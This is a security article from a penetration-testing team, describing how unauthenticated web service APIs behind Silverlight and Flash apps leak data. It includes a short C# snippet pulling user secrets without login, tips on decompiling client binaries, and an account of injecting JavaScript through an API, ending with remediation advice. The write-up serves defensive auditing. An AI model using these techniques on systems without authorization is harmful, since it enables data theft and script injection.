Welcome!

Microservices Expo Authors: Elizabeth White, Liz McMillan, Mehdi Daoudi, Pat Romanski, Flint Brenton

Related Topics: Microservices Expo, Java IoT, Microsoft Cloud, Silverlight, Cloud Security

Microservices Expo: Article

Any Means Possible: Tales from Penetration Testing

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability

When we aren't fighting crime, taking over the world, or enjoying a good book by the fire, we here on the eEye Research team like to participate in the Any Means Possible (AMP) Penetration Testing engagements with our clients. For us, it's a great way to interact one-on-one with IT folks and really dig into the security problems that they are facing. We can sharpen our skills with real-world scenarios and practice the academic techniques presented in the industry, all the while helping to connect better with our customers and identify their security needs. During these engagements, we target a number of attack surfaces, ranging from exposed external server interfaces to client-side attacks launched on individual workstations. What I would like to talk about today is centered purely on the web-based attack surface, with a common problem we see consistently during our AMP engagements.

When talking about web vulnerabilities, you can't even begin to breach the subject without someone throwing out Cross-Site Scripting (XSS) or SQL Injection (SQLi). Unfortunately, poor little web services never seem to get any attention in the mix. Web service vulnerabilities are arguably just as widespread and dangerous as the aforementioned classes of vulnerabilities, but with so little talk and discussion around them, very rarely are these issues identified and remediated. Let's fix that.

Vulnerabilities in web services stem from the developer's line of thinking that says "I can trust the input from programs that I write." It's true that in some situations data coming from a known source that you wrote can sometimes be trusted. This is not however true when that data communication travels over an untrusted medium, such as the Internet. A common mistake in web design and development that we still see frequently is a server relying on input that was parsed and filtered by the client's browser. An example of such would be JavaScript running in the browser that is doing all of the filtering for malicious characters. Surely the JavaScript has filtered out all characters that could allow an attacker to insert malicious SQL queries into the back-end SQL Database, right? Wrong, any data that the server receives from a client's browser can be sent directly to the server from another, custom-written, application. This means that an attacker can bypass server-provided client-side SQLi and XSS protections by simply sending the queries directly to the server. When traveling over the Internet, it becomes quite difficult to determine the exact means in which the data was sent; it may have never been sent from the application that you intended it to be sent from. This makes exploitation of these vulnerabilities a bit more obscure, but still possible. The same holds true for web service APIs used by client-side applications.

Figure 1: Demo Microsoft Silverlight application. The left is a failed attempt to login and reveal the user's secret data, the right is a successful login.

Many browser applications, such as Adobe Flash and Microsoft Silverlight, communicate back to the server programmatically using web services. These services are exposed interfaces on the server that can be called directly from custom-written applications. In many situations, these services can expose potentially sensitive and privileged information that would otherwise not be accessible. Figure 1 shows a Microsoft Silverlight application that was constructed for demonstration purposes. This application is not vulnerable to XSS or SQLi and, to the average user, there is nothing about this application that allows someone without a password to access the legitimate user's secret data. However, what a lot of people don't seem to take into consideration is that you have access to anything that is running in your browser. Now, we can't pull the entire project down off of the server, but we can reverse-engineer the application interface running in the browser to see if there is anything potentially sensitive that is being exposed.

The first thing that should be done when auditing web sites is to make sure all requests are being logged through a local request proxy. For this example, I will be using Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/) to log all of the requests that FireFox makes to our target Silverlight application. Right away, we see that the application requests an XAP file, shown in Figure 2. This is a fun thing to play around with that I will come back to later. As soon as we click the button on the page, we see the browser make a request to an SVC file; this is our web services interface and is also shown in Figure 2.

Figure 2: Browser makes requests for an XAP file and an SVC file. The XAP file is loaded immediately into the browser when the application is started and the SVC file is loaded as soon as the user attempts to submit data back to the server.

Now, when we find a site serving up an SVC web services file, it's usually game over for that particular site. The reason is that these interfaces are usually trusted by the developer. Developers will assume that the only thing calling these exposed interfaces is the client application that they wrote. However, browsing to the service file directly in your favorite web browser will usually show you the basic interface of the exposed web service. The next step is creating a custom application to interface with the web service directly. You can use any language that you want as long as it can interface with a web server, but I usually like to use C# in Visual Studio. Creating the application is quite easy - simply create a new C# project and add a service reference to the hosted SVC file. Visual Studio will automatically import all of the references to everything exposed by the service. Figure 3 shows what is exposed by the sample service.

Figure 3: Object Viewer's list of the imported Web Services interface.

This service exports two functions: GetUserSecret and Login. The interesting thing here is that GetUserSecret takes a string and gives back a string, likely representing the secret data associated with that provided user. Now, it's perfectly possible that there is some form of authentication check that happens on the server side when this function is called, which ensures no secrets are disclosed to unauthenticated clients. However, in many situations I have encountered, this is not the case. We can test if code is properly checking for authentication by writing our own custom interface for the exposed web service. The following code snippet instantiates a client and queries for the secret data of two users without first authenticating with the server. Figure 4 shows the output from that program.

LoginService.LoginServiceClient client = new LoginService.LoginServiceClient();
Console.WriteLine("eEyeResearch's secret: "+client.GetUserSecret("eEyeResearch"));
Console.WriteLine("admin's secret: " + client.GetUserSecret("admin"));

Figure 4: Output from the code written to call the example service directly.

The output from our code shows that this exposed service is callable directly, without requiring any authentication. The only information needed is the user's name and, as many of you know from attacks that have made the press over the past year, that information can be acquired through social engineering or brute force style attacks quite easily.

This vulnerability is quite straightforward, but I think many of you would be surprised how often we encounter issues very similar to this in real-world penetration testing scenarios. It's a fairly easy mistake to make, to assume that any malicious tampering of a web page would be done through a browser or front-end web application, but the simple truth is that this is not the case.

If you wanted to take this a bit further, you could examine the manifest files that are used by the client-side browser application. Remember the XAP file mentioned at the beginning? That file is actually a ZIP archive containing manifest information and binary executable files used by the Silverlight application. Examining these files will show you all of the web services APIs that the application can potentially call, even the authenticated ones. This information has proven to be quite useful on various engagements. A simple web application, that wasn't vulnerable to XSS or SQLi, revealed a manifest of previously unknown web services, which eventually allowed downloading all of the information hidden behind the login page. Because these services were only referenced after the user had authenticated through the login screen, these APIs may have never been found with a purely unauthenticated audit had the manifest files not been checked for additional exposed interfaces.

As if freely available manifest information wasn't enough, the DLL files presented in this archive can also prove to be a lot of fun. Ask any professional or hobby reverse-code engineer, languages such as Java or C# are quite easy to decompile. Due to the managed nature of such languages, there are actually freely available tools that do quite a good job of turning the compiled binaries back into the original (or very similar) high-level code. These DLLs only represent the client-side browser code that gets executed by Silverlight in the browser, so you won't be getting the original server code out of this. However, a very common mistake made by programmers is to incorporate some of the application logic into the user interface as well. In these situations, such reversing sessions may yield valuable information about how the application is working behind the scenes. In fact, this has been used in the past to gain all kinds of interesting information about target applications, including default credentials to the authenticated sections of the application, which were set in a button click-event handler of the application's user interface.

Though this entire article has been purely focused on Silverlight, the same concept applies to most other client-side web applications out there. Often times, these applications will rely on web services in order to communicate with the server, for both unauthenticated and authenticated communications alike. Developers often times rely on the client-side application to do all of the relevant filtering and data integrity checking of information being sent to these web services.

Along with authenticated actions on behalf of an unauthenticated application, we have used these service APIs to inject malicious data into hosted material. I think my favorite case with that was when we attacked a Flash application as part of an AMP engagement that called a web service API in the background. This API was used to lay text over greeting card images that were being hosted on the affected server. The Flash application filtered input to only allow alphanumeric characters but calling the API directly allowed us to insert malicious JavaScript to sit on top of the images. Upon viewing the page or the image link directly, we gained the ability to execute arbitrary JavaScript in the user's browser or embed hidden iFrames that could be used to host various exploits. The basic point here is that successful exploitation can yield a variety of things for the attacker. This isn't something that, when exploited, only dumps information or only changes the way a page is viewed; the limits of these vulnerabilities is only determined by the functionality of the web application.

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability. It's somewhat unfortunate that SQLi has become so trendy, taking away any deserved fame or glory from the other interesting web vulnerabilities. It's important to keep in mind that, though this was a very heavily focused Microsoft and Silverlight example, the same issues apply across the board in many different web application technologies. The issue is actually very easy to audit for, especially if you already know exactly what your application should and shouldn't be able to do at every level of authentication.

I recommend if you manage servers hosting websites or you manage the websites that you take a few minutes to sit down and browse through each of these services. Be aware of exactly what is exposed on the external facing interfaces. If anything looks out of place, try connecting directly to the service and see what information is exposed and available to your users. Try preventing the service from displaying its metadata by removing the mex endpoint binding and setting httpGetEnabled for service metadata to false in the web configuration file. This prevents users from reading the web services descriptions and makes it nontrivial to arbitrarily connect and communicate with these services without prior knowledge of the internal workings of the application. These problems are quite easy to identify, potentially trivial to remediate, and can save an organization from a serious compromise if steps are taken to proactively identify and address these issues.

•   •   •

This article was written by Jared Day, a researcher with eEye's Research Team led by Marc Maiffret.

If you are interested in learning more about our AMP services, you can visit our page here (http://www.eeye.com/services/penetration-testing).

More Stories By Jared Day

Jared Day, Security Research Engineer, eEye Research Team. He joined the research team in 2010 and works primarily as a security advocate for eEye clients; participating and leading the Any Means Possible (AMP) Penetration Tests, as well as custom private research related to malware, threat, and patch mitigation analysis.

Comments (0)

Share your thoughts on this story.

Add your comment
You must be signed in to add a comment. Sign-in | Register

In accordance with our Comment Policy, we encourage comments that are on topic, relevant and to-the-point. We will remove comments that include profanity, personal attacks, racial slurs, threats of violence, or other inappropriate material that violates our Terms and Conditions, and will block users who make repeated violations. We ask all readers to expect diversity of opinion and to treat one another with dignity and respect.


@MicroservicesExpo Stories
Enterprises are moving to the cloud faster than most of us in security expected. CIOs are going from 0 to 100 in cloud adoption and leaving security teams in the dust. Once cloud is part of an enterprise stack, it’s unclear who has responsibility for the protection of applications, services, and data. When cloud breaches occur, whether active compromise or a publicly accessible database, the blame must fall on both service providers and users. In his session at 21st Cloud Expo, Ben Johnson, C...
Most of the time there is a lot of work involved to move to the cloud, and most of that isn't really related to AWS or Azure or Google Cloud. Before we talk about public cloud vendors and DevOps tools, there are usually several technical and non-technical challenges that are connected to it and that every company needs to solve to move to the cloud. In his session at 21st Cloud Expo, Stefano Bellasio, CEO and founder of Cloud Academy Inc., will discuss what the tools, disciplines, and cultural...
21st International Cloud Expo, taking place October 31 - November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA, will feature technical sessions from a rock star conference faculty and the leading industry players in the world. Cloud computing is now being embraced by a majority of enterprises of all sizes. Yesterday's debate about public vs. private has transformed into the reality of hybrid cloud: a recent survey shows that 74% of enterprises have a hybrid cloud strategy. Me...
‘Trend’ is a pretty common business term, but its definition tends to vary by industry. In performance monitoring, trend, or trend shift, is a key metric that is used to indicate change. Change is inevitable. Today’s websites must frequently update and change to keep up with competition and attract new users, but such changes can have a negative impact on the user experience if not managed properly. The dynamic nature of the Internet makes it necessary to constantly monitor different metrics. O...
With the rise of DevOps, containers are at the brink of becoming a pervasive technology in Enterprise IT to accelerate application delivery for the business. When it comes to adopting containers in the enterprise, security is the highest adoption barrier. Is your organization ready to address the security risks with containers for your DevOps environment? In his session at @DevOpsSummit at 21st Cloud Expo, Chris Van Tuin, Chief Technologist, NA West at Red Hat, will discuss: The top security r...
Agile has finally jumped the technology shark, expanding outside the software world. Enterprises are now increasingly adopting Agile practices across their organizations in order to successfully navigate the disruptive waters that threaten to drown them. In our quest for establishing change as a core competency in our organizations, this business-centric notion of Agile is an essential component of Agile Digital Transformation. In the years since the publication of the Agile Manifesto, the conn...
The nature of the technology business is forward-thinking. It focuses on the future and what’s coming next. Innovations and creativity in our world of software development strive to improve the status quo and increase customer satisfaction through speed and increased connectivity. Yet, while it's exciting to see enterprises embrace new ways of thinking and advance their processes with cutting edge technology, it rarely happens rapidly or even simultaneously across all industries.
Many organizations are now looking to DevOps maturity models to gauge their DevOps adoption and compare their maturity to their peers. However, as enterprise organizations rush to adopt DevOps, moving past experimentation to embrace it at scale, they are in danger of falling into the trap that they have fallen into time and time again. Unfortunately, we've seen this movie before, and we know how it ends: badly.
These days, APIs have become an integral part of the digital transformation journey for all enterprises. Every digital innovation story is connected to APIs . But have you ever pondered over to know what are the source of these APIs? Let me explain - APIs sources can be varied, internal or external, solving different purposes, but mostly categorized into the following two categories. Data lakes is a term used to represent disconnected but relevant data that are used by various business units wit...
There is a huge demand for responsive, real-time mobile and web experiences, but current architectural patterns do not easily accommodate applications that respond to events in real time. Common solutions using message queues or HTTP long-polling quickly lead to resiliency, scalability and development velocity challenges. In his session at 21st Cloud Expo, Ryland Degnan, a Senior Software Engineer on the Netflix Edge Platform team, will discuss how by leveraging a reactive stream-based protocol,...
Today most companies are adopting or evaluating container technology - Docker in particular - to speed up application deployment, drive down cost, ease management and make application delivery more flexible overall. As with most new architectures, this dream takes significant work to become a reality. Even when you do get your application componentized enough and packaged properly, there are still challenges for DevOps teams to making the shift to continuous delivery and achieving that reducti...
Many organizations adopt DevOps to reduce cycle times and deliver software faster; some take on DevOps to drive higher quality and better end-user experience; others look to DevOps for a clearer line-of-sight to customers to drive better business impacts. In truth, these three foundations go together. In this power panel at @DevOpsSummit 21st Cloud Expo, moderated by DevOps Conference Co-Chair Andi Mann, industry experts will discuss how leading organizations build application success from all...
The last two years has seen discussions about cloud computing evolve from the public / private / hybrid split to the reality that most enterprises will be creating a complex, multi-cloud strategy. Companies are wary of committing all of their resources to a single cloud, and instead are choosing to spread the risk – and the benefits – of cloud computing across multiple providers and internal infrastructures, as they follow their business needs. Will this approach be successful? How large is the ...
You know you need the cloud, but you’re hesitant to simply dump everything at Amazon since you know that not all workloads are suitable for cloud. You know that you want the kind of ease of use and scalability that you get with public cloud, but your applications are architected in a way that makes the public cloud a non-starter. You’re looking at private cloud solutions based on hyperconverged infrastructure, but you’re concerned with the limits inherent in those technologies.
"NetApp's vision is how we help organizations manage data - delivering the right data in the right place, in the right time, to the people who need it, and doing it agnostic to what the platform is," explained Josh Atwell, Developer Advocate for NetApp, in this SYS-CON.tv interview at 20th Cloud Expo, held June 6-8, 2017, at the Javits Center in New York City, NY.
The “Digital Era” is forcing us to engage with new methods to build, operate and maintain applications. This transformation also implies an evolution to more and more intelligent applications to better engage with the customers, while creating significant market differentiators. In both cases, the cloud has become a key enabler to embrace this digital revolution. So, moving to the cloud is no longer the question; the new questions are HOW and WHEN. To make this equation even more complex, most ...
One of the biggest challenges with adopting a DevOps mentality is: new applications are easily adapted to cloud-native, microservice-based, or containerized architectures - they can be built for them - but old applications need complex refactoring. On the other hand, these new technologies can require relearning or adapting new, oftentimes more complex, methodologies and tools to be ready for production. In his general session at @DevOpsSummit at 20th Cloud Expo, Chris Brown, Solutions Marketi...
Leading companies, from the Global Fortune 500 to the smallest companies, are adopting hybrid cloud as the path to business advantage. Hybrid cloud depends on cloud services and on-premises infrastructure working in unison. Successful implementations require new levels of data mobility, enabled by an automated and seamless flow across on-premises and cloud resources. In his general session at 21st Cloud Expo, Greg Tevis, an IBM Storage Software Technical Strategist and Customer Solution Architec...
Today companies are looking to achieve cloud-first digital agility to reduce time-to-market, optimize utilization of resources, and rapidly deliver disruptive business solutions. However, leveraging the benefits of cloud deployments can be complicated for companies with extensive legacy computing environments. In his session at 21st Cloud Expo, Craig Sproule, founder and CEO of Metavine, will outline the challenges enterprises face in migrating legacy solutions to the cloud. He will also prese...
DevOps at Cloud Expo – being held October 31 - November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA – announces that its Call for Papers is open. Born out of proven success in agile development, cloud computing, and process automation, DevOps is a macro trend you cannot afford to miss. From showcase success stories from early adopters and web-scale businesses, DevOps is expanding to organizations of all sizes, including the world's largest enterprises – and delivering real r...